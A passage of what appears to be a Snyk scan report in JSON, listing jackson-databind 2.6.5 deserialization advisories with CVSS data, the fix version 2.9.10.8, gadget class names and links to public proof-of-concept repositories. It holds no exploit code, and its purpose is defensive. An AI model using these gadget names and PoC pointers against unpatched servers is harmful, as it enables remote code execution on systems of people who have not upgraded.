gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + 